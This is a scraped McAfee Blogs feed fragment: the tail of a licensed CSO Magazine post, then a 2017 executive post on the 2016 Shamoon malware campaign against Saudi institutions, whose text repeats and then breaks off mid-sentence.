This article was written by Maria Korolov from CSO Magazine and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post Automated mitigation on endpoint devices and networks can be tricky appeared first on McAfee Blogs.

]]>
McAfee Raises the Stakes Against Cyberespionage https://securingtomorrow.mcafee.com/executive-perspectives/mcafee-raises-stakes-cyberespionage/ https://securingtomorrow.mcafee.com/executive-perspectives/mcafee-raises-stakes-cyberespionage/#respond Wed, 03 May 2017 21:25:50 +0000 https://securingtomorrow.mcafee.com/?p=73384 On November 17, 2016, Shamoon malware struck once more. As with the first Shamoon assault five years ago, the target was Saudi Arabia. But while earlier attacks focused on critical oil and gas infrastructure, last fall’s campaigns targeted Saudi government institutions, financial services, and other sectors. The objective was to gather information on individuals and …

The post McAfee Raises the Stakes Against Cyberespionage appeared first on McAfee Blogs.

]]>
On November 17, 2016, Shamoon malware struck once more.

As with the first Shamoon assault five years ago, the target was Saudi Arabia. But while earlier attacks focused on critical oil and gas infrastructure, last fall’s campaigns targeted Saudi government institutions, financial services, and other sectors. The objective was to gather information on individuals and organizations and wipe critical systems clean. With aggressive assaults across such a broad scope of attack surfaces, the latest Shamoon campaigns were nothing short of attempts to disrupt an entire nation.

Such an effort isn’t audacious given other events over the last several months. We’ve heard the revelations about the breach at Yahoo, watched the Mirai DDoS attack disrupt huge swaths of the Internet, and tried to come to terms with a DNC hack that many say influenced the American democratic process. The re-emergence of Shamoon is just the latest reminder that life and liberty can be imperiled by cyber-attacks.

It’s time—once again—for all of us to raise the stakes in our cybersecurity fight. We must match the audacious efforts of our adversaries with our own.

On the heels of the “new” McAfee launch, we are taking an imp